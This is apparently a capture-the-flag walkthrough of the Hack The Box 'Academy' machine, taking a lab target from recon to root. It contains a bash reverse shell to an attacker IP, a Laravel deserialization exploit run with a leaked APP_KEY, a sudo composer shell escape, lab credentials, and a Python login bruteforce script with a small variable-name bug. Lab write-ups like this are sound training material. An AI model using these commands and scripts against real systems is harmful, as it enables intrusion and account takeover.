ACADEMY

PRIMARY CATEGORY → EASY

Summary

• Web Enumeration (Directory Fuzzing with NMap)
• Custom Dictionary Creation (Python Scripting)
• Bruteforcing a Login Panel with Python Scripting
• User Registration Role Changing (Via Burpsuite)
• Exploiting CVE-2018-15133 (RCE Via Insecure Object Deserialization)
• Privesc via Information Leakage
• Privesc via Sudo Privileges

---

Setup

Directory creation with the Machine’s Name

mkdir Academy && cd !$

Creation of a Pentesting Folder Structure to store all the information related to the target

Reference

Academy

mkt

Tree

.
├── evidence
│   ├── creds
│   ├── data
│   └── screenshots
├── logs
├── scans
├── scope
└── tools

---

Recon

OS Identification

First, proceed to identify the Target Operative System. This can be done by a simple ping taking into account the TTL Unit

The standard values are →

• About 64 → Linux
• About 128 → Windows

Academy/scans

ping -c1 10.129.148.205

Command Output

PING 10.129.148.205 (10.129.148.205) 56(84) bytes of data.
64 bytes from 10.129.148.205: icmp_seq=1 ttl=63 time=44.7 ms
 
--- 10.129.148.205 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 44.690/44.690/44.690/0.000 ms

As mentioned, according to the TTL, It seems that It is a Linux Target

Port Scanning

General Scan

Let’s run a Nmap Scan to check what TCP Ports are opened in the machine

The Scan result is exported in a grepable format for subsequent Port Parsing

Academy/scans

nmap -p- --open -sS --min-rate 5000 -n -vvv -Pn -oG allPorts 10.129.148.205

AllPorts Output

Academy/scans/AllPorts

# Nmap 7.94SVN scan initiated Fri Nov  1 20:47:10 2024 as: nmap -p- --open -sS --min-rate 5000 -n -vvv -Pn -oG allPorts 10.129.148.205
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.129.148.205 () Status: Up
Host: 10.129.148.205 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 33060/open/tcp//mysqlx/// Ignored State: closed (65532)
# Nmap done at Fri Nov  1 20:47:23 2024 -- 1 IP address (1 host up) scanned in 12.67 seconds

Open Ports → 22, 80, 33060

Comprehensive Scan

The ExtractPorts utility is used to get a Readable Summary of the previous scan and have all Open Ports copied to the clipboard

Academy/Scans

extractPorts allPorts

ExtractPorts Output

Academy/scans

[+] Extracting information...
 
    [+] IP Address: 10.129.148.205
    [+] Open Ports: 22,80,33060
 
[+] Ports Copied to Clipboard

Then, the Comprehensive Scan is performed to gather the Service and Version running on each open port and launch a set of Nmap Basic Recon Scripts

Note that this scan is also exported to have evidence at hand

Academy/Scans

nmap -p22,80,33060 -sCV -oN targeted 10.129.148.205

Targeted Output

Academy/scans/targeted

# Nmap 7.94SVN scan initiated Fri Nov  1 20:51:24 2024 as: nmap -p22,80,33060 -sCV -oN targeted 10.129.148.205
Nmap scan report for academy.htb (10.129.148.205)
Host is up (0.10s latency).
 
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Hack The Box Academy
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=11/1%Time=67253147%P=x86_64-pc-linux-gnu%
SF:r(GenericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov  1 20:54:20 2024 -- 1 IP address (1 host up) scanned in 176.38 seconds

OS Version (Codename)

In Linux Systems, the Operative System Version could be extracted through Launchpad

According to the Version Column Data of the Comprehensive Scan, proceed as follows →

• 22 - SSH

Reference

Firefox

OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 site:launchpad.net

• 80 - HTTP

Reference

Firefox

Apache httpd 2.4.41 site:launchpad.net

Codename → Ubuntu Focal

This can be verified once the shell is obtained, i.e. the system has been compromised

There are several ways to carry out it →

cat /etc/os-release

hostnamectl # If System has been booted via Systemd

lsb_release -a

cat /etc/issue

cat /proc/version

22 - SSH

OpenSSH Version → v8.2

All the OpenSSH Versions prior to the v7.7 one are vulnerable to a System User Enumeration

Although, in this case It does not apply due to the current OpenSSH Version

Banner Grabbing

The Version of the Service running can also be obtained via Banner Grabbing as follows →

Academy/scans

nc -v 10.129.148.205 22 <<< ""

Command Output

Academy/scans

academy.htb [10.129.148.205] 22 (ssh) open
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1
Invalid SSH identification string.

33060 - MySQLx

Banner Grabbing

nc -v 10.129.148.205 33060 <<< ""

Command Output

academy.htb [10.129.148.205] 33060 (?) open

No information related to the Service running in 33060 Port is displayed

Let’s move into the next for the moment

80 - HTTP

General Information

• Banner Grabbing

Academy/scans

nc -v 10.129.148.205 80 <<< ""

Command Output

Academy/scans

10.129.148.205: inverse host lookup failed: Unknown host
(UNKNOWN) [10.129.148.205] 80 (http) open
HTTP/1.1 400 Bad Request
Date: Sat, 02 Nov 2024 07:10:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1
 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 127.0.1.1 Port 80</address>
</body></html>

The Web Server is an Apache, if a Local File Inclusion arises in the Web Application, we can start thinking about Apache’s Default Logs Paths to achieve an RCE via Log Poisoning

• Server HTTP Response Headers

Academy/scans

curl --silent --request GET --location --head "http://10.129.148.205"

Command Output

Academy/Scans

HTTP/1.1 302 Found
Date: Sat, 02 Nov 2024 07:09:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: http://academy.htb/
Content-Length: 0
Content-Type: text/html; charset=UTF-8

Same as above

Web Technologies

Let’s see the Web Application Technologies →

• Whatweb

Academy/scans

whatweb http://10.129.148.205

Command Output

Academy/scans

http://10.129.148.205 [302 Found] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.148.205], RedirectLocation[http://academy.htb/]
ERROR Opening: http://academy.htb/ - no address for academy.htb

From a request to the above URL, a redirection, through the HTTP Response’s Location Header, is applied to the Academy.htb Vhost

Just add the following lines in the /etc/hosts file

/etc/hosts

printf "%s" "10.129.148.205  academy.htb" >> /etc/hosts

/etc/hosts

# Others
10.129.148.205  academy.htb

Check it sending a ping to the vhost →

ping -c1 academy.htb

Nmap Fuzzing

Before proceed with Directory Enumeration using known Fuzzers, such as gobuster or wfuzz, run the Nmap Small Fuzzer first

Academy/scans

nmap -p80 --script http-enum -oN simpleWebScan 10.129.148.205

simpleWebScan

# Nmap 7.94SVN scan initiated Sat Nov  2 08:05:11 2024 as: nmap -p80 --script http-enum -oN simpleWebScan 10.129.148.205
Nmap scan report for academy.htb (10.129.148.205)
Host is up (0.053s latency).
 
PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|   /admin.php: Possible admin folder
|_  /login.php: Possible admin folder
 
# Nmap done at Sat Nov  2 08:05:23 2024 -- 1 IP address (1 host up) scanned in 11.43 seconds

Two interesting resources are extracted, a Login Panel and one related to web administration

Furthermore, the above resources are PHP Scripts, therefore, we know that the Server side Language Programming is PHP

So, if a Command Injection or an RCE occurs, we can start thinking in several php functions to run commands in the system such as exec(), shell_exec(), system()

Web Technologies #1

Once you access the website, let’s check again the Web Technologies reported by Wappalyzer

Zoom In

PHP as Programming Languages again

Browser-Based Web Revision

The following is displayed as a Home Page →

Zoom In

There is a Login section which corresponds to the above found login.php resource

The other one is a Register section, related to a register.php file

• Login.php

Zoom In

Trying to spray common credentials such as admin:admin, guest:guest or similar does not work

We can run this script to generate a dictionary (like Cewl does) and try to bruteforce the Login Panel

Since this website seems to be a custom one i.e. not a known CMS, we cannot find any default credentials

Therefore, let’s try to check the registration funcionality in the register.php and create a valid user if It allows it

• Register.php

Zoom In

We intercept with a HTTP Proxy, such as Burpsuite, the HTTP request and send it to the Repeater section

Zoom In

A POST Parameter that we could not be able to see it before in the Register Panel draws our attention

Its name is roleid and It seems such as Boolen or Integer Parameter. Its default value is 0

We can interpret that the default value, 0, is related to an Standard User default Role

Let’s see what happens if we change that Parameter value to 1

Zoom In

A 301 HTTP Status Code followed by a 200 one appears in the HTTP Server Responses

It seems that our user has been created, let’s log in in the login.php resource and see what happens

The following web page appears after log in → home.php

Zoom In

If we take a look to the website, there is nothing interesting there according to certain functionalities. It is a fairly static website

Remember that we found earlier an admin.php resource

• Admin.php

Zoom In

Another login panel

It is not too much reasonable to think that we can log in with a Standard Username

But we altered the default Register Process modifying the roleid parameter

Thus, let’s see if we can log in

And we’re in!

---

Exploitation

RCE via Insecure Object Deserialization

An admin-page.php is displayed with the following content in the Admin.php resource

Zoom In

Some sensitive information is leaked

• Some Potential System or Web Application Users → cry0l1t3 and mrb3n
• A subdomain → dev-staging-01.academy.htb

According to what It appears, It seems that the above subdomain is related to another Web Application with a issue to fix

Let’s add the corresponding line in the /etc/hosts file and check it

/etc/hosts

printf "\t%s" "dev-staging-01.academy.htb" /etc/hosts

/etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  parrot
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
# Others
10.129.148.205  academy.htb dev-staging-01.academy.htb

Once we access to the Web Page related to the dev-staging-01.academy.htb subdomain (Another Virtual Host), it displays the following content →

Zoom In

According to all the data displayed, It seems like we are facing a Laravel Application

Reference

• Laravel → PHP Web Application Framework

In this case, this Laravel Application has Debug Mode enabled since one issue, with the application, has been reported as we saw earlier

Note that, when Laravel Debug Mode is set, some interesting information is leaked such as the Web Application System Path, Enviroment Parameters and other juicy data

But, amongs all this information, the following stands out →

Zoom In

• APP_KEY

• Database Credentials

Since we tried before to connect to the 33060 Port related to a MySQLx service but we couldn’t, let’s store this credentials for later use

In the other hand, we have the APP_KEY value, Normally, this APP_KEY is used by the Laravel Application to encrypt some authentication or session objects

This prevents those objects from being modified on the Client-Side. Therefore, no malicious payload crafting or modification of those objects can be performed

But, if the Laravel APP_KEY is leaked and the Object Deserialization performed in the Server-Side is not sanitized correctly, an attacker could craft a malicious payload to perform some Code Execution when the payload is deserialized

The above situation arise in certain Laravel versions, being these ones vulnerables, as mentioned here

See this too

Therefore, let’s try blindly to know if this Laravel Application is a vulnerable one

The following script has been developed to exploit this vulnerability

All related information also here

Check the Exploit here

Therefore, let’s run it as follows →

Academy/tools

mkdir Laravel
cd !$

Academy/tools/Laravel

wget "https://raw.githubusercontent.com/4l3xBB/Exploits/refs/heads/main/CVE-2018-15133/CVE-2018-15133.py" "https://raw.githubusercontent.com/4l3xBB/Exploits/refs/heads/main/CVE-2018-15133/requirements.txt"

Academy/tools/Laravel

python -m venv venv
source ./venv/bin/activate

pip install -r requirements.txt

Once the Script Setup is done, execute is as follows →

python3 CVE-2018-15133.py <APP_KEY> <URL> <ATTACKER_IP> <ATTACKER_LPORT>

Therefore

python3 CVE-2018-15133.py "dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=" "http://dev-staging-01.academy.htb/" "10.10.16.30" 443

Zoom In

We’re in!

---

Shell as Web User

As the tool says, the Reverse Shell obtained is an inestable one

Thus, just set a listen port in the Attacker Host and stablish another Reverse Connection from the Target Host as follows →

Attacker

nc -nlvp 444

Target

bash -c "bash -i &> /dev/tcp/10.10.16.30/444 0>&1"

Once a connection via Reverse Shell is stablished, just proceed as follows to upgrade the obtained shell to a Fully Interactive TTY

Reference

Script

Target

script /dev/null -c bash
<C-z>

Attacker

stty raw -echo ; fg
reset xterm

Target

export TERM=xterm-256color
export SHELL=/bin/bash
. /etc/skel/.bashrc
stty rows <ROWS> columns <COLUMNS>

---

Privesc

Initial Non-Privileged User → www-data

Check the existent user directories in /home

ls -l /home

Command Output

total 24
drwxr-xr-x 2 21y4d    21y4d    4096 Aug 10  2020 21y4d
drwxr-xr-x 2 ch4p     ch4p     4096 Aug 10  2020 ch4p
drwxr-xr-x 7 cry0l1t3 cry0l1t3 4096 Nov  1 15:06 cry0l1t3
drwxr-xr-x 3 egre55   egre55   4096 Aug 10  2020 egre55
drwxr-xr-x 2 g0blin   g0blin   4096 Aug 10  2020 g0blin
drwxr-xr-x 5 mrb3n    mrb3n    4096 Aug 12  2020 mrb3n

Likewise →

grep -i -- sh\$ /etc/passwd

Command Output

root:x:0:0:root:/root:/bin/bash
egre55:x:1000:1000:egre55:/home/egre55:/bin/bash
mrb3n:x:1001:1001::/home/mrb3n:/bin/sh
cry0l1t3:x:1002:1002::/home/cry0l1t3:/bin/sh
21y4d:x:1003:1003::/home/21y4d:/bin/sh
ch4p:x:1004:1004::/home/ch4p:/bin/sh
g0blin:x:1005:1005::/home/g0blin:/bin/sh

In this case, there are quite a few users

Remember that some users were leaked earlier in the dev-staging-01.academy.htb’s Web Page

• cry0l1t3
• mrb3n

Hint

We may have to pivot between those users in order to become the Root User

Information Leakage - Web Application File

if we access to the /var/www/html directory, there are some directories related to different Web Projects/Applications

ls -la /var/www/html

Command Output

total 20
drwxr-xr-x  4 root     root     4096 Aug 13  2020 .
drwxr-xr-x  3 root     root     4096 Aug  7  2020 ..
drwxr-xr-x 12 www-data www-data 4096 Aug 13  2020 academy
drwxr-xr-x 12 root     root     4096 Aug 13  2020 htb-academy-dev-01
-rw-r--r--  1 www-data www-data   50 Aug  9  2020 index.php

Examining the academy directory, we find the .env resource

cat .env

Command Output

APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost
 
LOG_CHANNEL=stack
 
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
 
BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync
 
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
 
MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null 

This file contains several credentials related to the Application and Connection Database

• Password → mySup3rP4s5w0rd!!

We can check if Password Reusage applies in this case with the above listed system users

su cry0l1t3

and Boom!

We have been able to migrate to the cry0l1t3 user

User.txt Flag

This user has the User.txt flag in its home directory

Therefore, let’s report it in HTB →

cat ~/user.txt

Information Leakage - ADM Group

Current User → cry0l1t3

Let’s check the groups to which the current user belongs

id

Command Output

uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)

This user is part of the ADM group

Any user belonging to this group usually has permissions to check the System and Services Logs located in the /var/log directory

Therefore, let’s apply some recursive research trying to get some sensible content from those logs

grep -RiP -- '(pass|passwd|password|su|mrb3n|egre55|21y4d|g0blin)' /var/log 2> /dev/null | less -R

Nothing interesting

But we found something checking the audit.log as follows →

Reference

aureport --tty | grep -iP -- "(su|sudo)"

Command Output

Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl\>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl\>

The data which appears in the second line seems like a Password and It contains mrb3n, an existent System User

Let’s try to log in as mrb3n using the above string

and Boom Again!

We have been able to migrate to the mrb3n user

Sudo Privileges

If we list the Sudo Privileges of the current user →

sudo -l

Command Ouput

[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

The current user can run as ANY USER the /usr/bin/composer binary, i.e. we can run this binary as Root

So, if we are able to spawn a shell through this binary, we can spawn it as Root

Let’s check this in gtfobins.github.io

And there is way to accomplish the above action!

Reference

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

And Boom Again! 😊 We are Root!

At this point, simpy report the Root.txt flag and leave

cat ~/root.txt

---

Custom Exploits

Dictionary Generation - Bruteforce Login Panel

Bruteforce Script

#!/usr/bin/env python3
 
import requests
import os, sys
import time
from colorama import Fore, Style
from bs4 import BeautifulSoup
import signal
 
from pwn import *
 
def sigint_handler(sig, frame):
 
    print('\n')
    p = log.progress(Fore.CYAN + f'Signal' + Style.RESET_ALL)
    p.status(Fore.MAGENTA + 'SIGINT Signal sent to the Process Group. Exiting... ⌛' + Style.RESET_ALL)
    time.sleep(1)
 
    signal.signal(signal.SIGINT, signal.SIG_DFL)
 
    p.success(Fore.RED + 'Exited ✅' + Style.RESET_ALL)
 
    os.killpg(os.getpid(), signal.SIGINT)
 
def doLogin(url, user, password):
 
    session = requests.Session()
 
    data = {
        'uid' : user,
        'password' : password
    }
 
    try:
        bar = log.progress("Authentication")
        
        bar.status(f"Proceeding to log in as {user}...")
 
        time.sleep(2)
 
        r = session.post(url, data=data, allow_redirects=False)
 
        if r.status_code == 302:
            bar.success("Login Successfull")
            return session
        else:
            print(Fore.RED + f"[!] Unsuccessfull Login: {r.status_code}" + Style.RESET_ALL)
            sys.exit(1)
 
    except requests.ConnectionError as e:
 
        print(f"ConnectionError: {e}")
        sys.exit(1)
 
    except requests.Timeout as e:
 
        print(f"Timeout: {e}")
        sys.exit(1)
 
    except requests.RequestException as e:
 
        print(f"Error: {e}")
        sys.exit(1)
 
def extract(url, session, file):
 
    try:
 
        bar = log.progress('Password Dictionary')
 
        bar.status('Creating the Password Dictionary')
 
        time.sleep(2)
 
        r = session.get(url)
 
        if r.ok:
 
            soup = BeautifulSoup(r.text, 'html.parser')
 
            content = soup.get_text().split()
 
            with open(file, 'w') as f:
 
                for word in content:
 
                    f.write(word.strip() + "\n")
 
            bar.success('File Created correctly')
 
        else:
            print(Fore.RED + f"[!] Status Code Error: {r.status_code}" + Style.RESET_ALL)
            sys.exit(1)
 
    except requests.RequestException as e:
        
        print(f"Error: {e}")
        sys.exit(1)
 
    except Exception as e:
        
        print(f"Error: {e}")
        sys.exit(1)
 
def bruteforce(url, user_file, pass_file):
 
    try:
 
        with open(user_file, 'r') as u, open(pass_file, 'r') as p:
 
            users = [ user.strip() for user in u ]
            passwords = [ password.strip() for password in p ]
 
        bar = log.progress('Bruteforce')
 
        for user in users:
 
            for passwd in passwords:
 
                bar.status(f"Bruteforcing Login Panel -> {user}:{passwd}")
 
                data = {
                    'uid' : user,
                    'password' : passwd
                }
 
                r = requests.post(url, data=data, allow_redirects=False)
 
                if r.status_code == 302:
 
                    bar.success(f"Login Successfull -> User: {use} and Password: {passwd}")
                    return True
 
        bar.failure("Could not Bruteforce the Login Panel")
        return False
 
    except FileNotFoundError as e:
 
        print(f"File not Found: {e}")
        sys.exit(1)
 
    except requests.ConnectionError as e:
 
        print(f"Connection Error: {e}")
        sys.exit(1)
 
    except requests.Timeout as e:
 
        print(f"Timeout: {e}")
        sys.exit(1)
 
    except Exception as e:
 
        print(f"Error: {e}")
        sys.exit(1)
 
if __name__ == '__main__':
 
    signal.signal(signal.SIGINT, sigint_handler) 
 
    login_url = "http://academy.htb/login.php"
    home_url = "http://academy.htb/home.php"
 
    user = password = 'test'
 
    user_file = 'users'
    pass_file = 'dictionary.txt'
 
    session = doLogin(login_url, user, password)
 
    extract(home_url, session, pass_file)
 
    bruteforce(login_url, user_file, pass_file)

CVE-2018-15133

See here